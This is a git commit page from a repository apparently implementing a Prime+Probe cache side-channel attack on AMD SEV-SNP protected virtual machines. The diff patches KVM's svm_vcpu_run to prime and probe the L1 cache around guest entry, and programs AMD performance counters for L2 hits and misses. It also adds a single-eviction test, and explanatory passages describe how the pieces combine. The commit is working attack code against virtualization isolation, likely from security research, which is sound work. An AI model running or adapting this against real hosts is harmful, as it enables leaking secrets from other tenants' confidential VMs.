cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc

commit 576e8dc70825a04af3ac9890491d348959bf19ce
parent 8dc6462e70009c0bbcf0bbfcfd2d4494d3772580
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu,  4 Aug 2022 10:59:55 +0200

Vincent's working single eviction test

Diffstat:
M .gitignore    |  1 +
M Makefile      |  0
M patch.diff    | 23 +++++++++++++----------
M read.c        |  2 ++
M src/asm.h     | 10 +++++-----
M src/cachepc.c |  6 +++---
M src/cachepc.h | 15 +++++++++++----
M src/util.c    |  0
M src/util.h    |  0
9 files changed, 35 insertions(+), 22 deletions(-)

diff --git a/.gitignore b/.gitignore
@@ -3,3 +3,4 @@ push.sh
 *.o.cmd
 *.o
 read
+.vscode
diff --git a/Makefile b/Makefile
diff --git a/patch.diff b/patch.diff
@@ -24,7 +24,7 @@ index b804444e16d4..c94f8c4460f1 100644
  obj-$(CONFIG_KVM) += kvm.o
  obj-$(CONFIG_KVM_INTEL) += kvm-intel.o
 diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
-index 7b3cfbe8f7e3..71697d08e9e4 100644
+index 7b3cfbe8f7e3..f9a6b37eb36a 100644
 --- a/arch/x86/kvm/svm/svm.c
 +++ b/arch/x86/kvm/svm/svm.c
 @@ -2,6 +2,8 @@
@@ -36,7 +36,7 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644
  #include "irq.h"
  #include "mmu.h"
  #include "kvm_cache_regs.h"
-@@ -3785,8 +3787,18 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+@@ -3785,8 +3787,19 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
 
  static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
  {
@@ -48,7 +48,8 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644
 +	struct vcpu_svm *svm;
 +
 +	printk(KERN_WARNING "CachePC: svm_cpu_enter_exit()\n");
-+
++	printk(KERN_WARNING "Vincent CachePC: svm_cpu_enter_exit()\n");
++	cachepc_init_counters();
 +	if (!ctx) ctx = cachepc_get_ctx(L1);
 +	if (!ds) ds = cachepc_prepare_ds(ctx);
 +
 	svm->vmcb->save.rax = vcpu->arch.regs[VCPU_REGS_RAX];
 	svm->vmcb->save.rsp = vcpu->arch.regs[VCPU_REGS_RSP];
 	svm->vmcb->save.rip = vcpu->arch.regs[VCPU_REGS_RIP];
-@@ -3835,8 +3847,14 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
+@@ -3835,8 +3848,15 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
 	 */
 	x86_spec_ctrl_set_guest(svm->spec_ctrl, svm->virt_spec_ctrl);
 
 +	svm_vcpu_enter_exit(vcpu);
 +
 +	cachepc_probe(head);
 +	//cachepc_print_msrmts(head);
++	printk(KERN_WARNING "Vincent: Saving measurements\n");
 +	cachepc_save_msrmts(head);
 +
 	/*
 	 * We do not use IBRS in the kernel. If this vCPU has used the
 	 * SPEC_CTRL MSR it may have left it on; save the value and
-@@ -3912,6 +3930,8 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
+@@ -3912,6 +3932,8 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
 	if (is_guest_mode(vcpu))
 		return EXIT_FASTPATH_NONE;
 
 +
 }
 
 diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
-index 2541a17ff1c4..757128b13fe5 100644
+index 2541a17ff1c4..1c3c3b63baba 100644
 --- a/virt/kvm/kvm_main.c
 +++ b/virt/kvm/kvm_main.c
 @@ -51,6 +51,9 @@
 
 __visible bool kvm_rebooting;
 EXPORT_SYMBOL_GPL(kvm_rebooting);
 
-@@ -4765,12 +4782,94 @@ static void check_processor_compat(void *data)
+@@ -4765,12 +4782,95 @@ static void check_processor_compat(void *data)
 	*c->ret = kvm_arch_check_processor_compat(c->opaque);
 }
 
 +	cacheline *head;
 +	cacheline *ptr;
 +
-+	ptr = cachepc_prepare_victim(cachepc_ctx, 5);
++	ptr = cachepc_prepare_victim(cachepc_ctx, 48);
 +	head = cachepc_prime(cachepc_ds);
 +	cachepc_victim(ptr);
 +	cachepc_probe(head);
 +
 int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
 	     struct module *module)
 {
++	printk(KERN_WARNING "Vincent: KVM Init called\n");
 	struct kvm_cpu_compat_check c;
 -	int r;
 -	int cpu;
 +
 	r = kvm_arch_init(opaque);
 	if (r)
-@@ -4848,6 +4947,20 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+@@ -4848,6 +4948,20 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
 	r = kvm_vfio_ops_init();
 	WARN_ON(r);
 
 +
 	return 0;
 
 out_unreg:
-@@ -4872,6 +4985,12 @@
+@@ -4872,6 +4986,12 @@
 void kvm_exit(void)
 {
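
Taken together, the patch.diff hunks bracket the guest entry with a Prime+Probe measurement. The following is a minimal sketch of that control flow, not code from the patch: the cachepc_* helpers, ctx, ds, head and the cacheline type are the repository's own, while the wrapper function itself is purely illustrative.

    /* Sketch: how the svm_vcpu_run() hooks compose (illustrative wrapper). */
    static void cachepc_measure_vmrun(struct kvm_vcpu *vcpu)
    {
            cacheline *head;

            if (!ctx) ctx = cachepc_get_ctx(L1);   /* L1 cache geometry */
            if (!ds) ds = cachepc_prepare_ds(ctx); /* eviction set covering all cache sets */

            head = cachepc_prime(ds);    /* fill every set with attacker lines */
            svm_vcpu_enter_exit(vcpu);   /* guest runs and evicts some of them */
            cachepc_probe(head);         /* re-touch the lines, counting hits/misses */
            cachepc_save_msrmts(head);   /* keep per-set counts for userspace */
    }

Priming immediately before VMRUN and probing immediately after it is what turns the guest's memory accesses into per-cache-set miss counts.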
diff --git a/read.c b/read.c
@@ -17,6 +17,8 @@ main(int argc, const char **argv)
 	assert(len == sizeof(counts));
 
 	for (i = 0; i < 64; i++) {
+		//printf("%d %hu\n", i, counts[i]);
+		//continue;
 		if (i % 16 == 0 && i)
 			printf("\n");
 		if (counts[i] > 0)
diff --git a/src/asm.h b/src/asm.h
@@ -36,7 +36,7 @@ cachepc_readpmc(uint64_t event)
 		: "c"(event)
 	);
 
-	return ((uint64_t) hi << 32) | lo;
+	return ((uint64_t) hi << 32) | (uint64_t)lo;
 }
 
 void
@@ -58,7 +58,7 @@ cachepc_lfence(void)
 	);
 }
 
-void
+inline void
 cachepc_sfence(void)
 {
 	asm volatile(
@@ -67,7 +67,7 @@ cachepc_sfence(void)
 	);
 }
 
-void
+inline void
 cachepc_mfence(void)
 {
 	asm volatile(
@@ -76,7 +76,7 @@ cachepc_mfence(void)
 	);
 }
 
-void
+inline void
 cachepc_readq(void *p)
 {
 	asm volatile (
@@ -85,7 +85,7 @@ cachepc_readq(void *p)
 	);
 }
 
-void
+inline void
 cachepc_victim(void *p)
 {
 	cachepc_mfence();
diff --git a/src/cachepc.c b/src/cachepc.c
@@ -24,10 +24,10 @@ cachepc_init_counters(void)
 	 *
 	 * 6 slots total
 	 */
-
+
 	reg_addr = 0xc0010200;
-	event_no = 0x64;
-	event_mask = 0x08;
+	event_no = 0x64;//0x29;//0x64;
+	event_mask = 0x08; //0x07; //0x08;
 	event = event_no | (event_mask << 8);
 	event |= (1ULL << 17); /* OS (kernel) events only */
 	event |= (1ULL << 22); /* enable performance counter */
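
The counter this cachepc.c hunk retunes is programmed through an AMD PERF_CTL MSR (reg_addr 0xc0010200 is PERF_CTL0). As a standalone sketch of the same encoding, with the bit positions taken from the file's own code and comments (event select in bits 0-7, unit mask in bits 8-15, bit 17 restricts counting to OS/kernel mode, bit 22 enables the counter; event 0x64 with mask 0x08 is the L2 event selected here, 0x29/0x07 the commented-out alternative):

    #include <stdint.h>

    /* Sketch: the PERF_CTL value built by cachepc_init_counters(). */
    static uint64_t perf_ctl_encode(uint64_t event_no, uint64_t event_mask)
    {
            uint64_t event;

            event = event_no | (event_mask << 8);
            event |= (1ULL << 17); /* OS (kernel) events only */
            event |= (1ULL << 22); /* enable performance counter */
            return event;          /* written to PERF_CTL via wrmsr */
    }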
diff --git a/src/cachepc.h b/src/cachepc.h
@@ -103,6 +103,7 @@ cachepc_probe(cacheline *start_cl)
 {
 	uint64_t pre1, pre2;
 	uint64_t post1, post2;
+	volatile int i = 0;
 	cacheline *next_cl;
 	cacheline *curr_cl;
 
@@ -112,6 +113,11 @@ cachepc_probe(cacheline *start_cl)
 	cachepc_cpuid();
 	cachepc_mfence();
 
+	pre1 = cachepc_readpmc(L2_HIT_CNTR);
+	pre2 = cachepc_readpmc(L2_MISS_CNTR);
+
+	cachepc_cpuid();
+	cachepc_mfence();
 	asm volatile(
 		"mov 8(%[curr_cl]), %%rax \n\t" // +8
 		"mov 8(%%rax), %%rcx \n\t" // +16
@@ -130,13 +136,13 @@ cachepc_probe(cacheline *start_cl)
 
 	cachepc_cpuid();
 	cachepc_mfence();
-	pre1 = cachepc_readpmc(L2_HIT_CNTR);
-	pre2 = cachepc_readpmc(L2_MISS_CNTR);
 
 	cachepc_cpuid();
 	cachepc_mfence();
-
-	msleep(100);
+
+	//msleep(100);
+	//for(i=0; i<100000; ++i){
+	//}
 
 	post1 = cachepc_readpmc(L2_HIT_CNTR);
 	cachepc_cpuid();
@@ -147,6 +153,7 @@ cachepc_probe(cacheline *start_cl)
 		curr_cl->count = 0;
 		curr_cl->count += post1 - pre1;
 		curr_cl->count += post2 - pre2;
+		curr_cl = next_cl;
 	} while (__builtin_expect(curr_cl != start_cl, 1));
 
 	return curr_cl->next;
diff --git a/src/util.c b/src/util.c
diff --git a/src/util.h b/src/util.h
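
The "single eviction test" named in the commit message is the kvm_main.c addition above, and it follows the textbook Prime+Probe self check. A sketch of the sequence (cachepc_ctx, cachepc_ds and the cachepc_* helpers are the repository's own; the function name and the expectation comment are illustrative; 48 is the cache set index the commit switches the victim to):

    /* Sketch: single-eviction self test. After priming, touching one
     * victim line should make exactly one cache set report a miss. */
    static void single_eviction_test(void)
    {
            cacheline *head, *ptr;

            ptr = cachepc_prepare_victim(cachepc_ctx, 48); /* victim mapping to set 48 */
            head = cachepc_prime(cachepc_ds);              /* occupy every set */
            cachepc_victim(ptr);                           /* evict one primed line */
            cachepc_probe(head);                           /* per-set hit/miss counts */
    }

read.c then prints the 64 per-set counts in rows of 16, so a working run shows up as a single hot set.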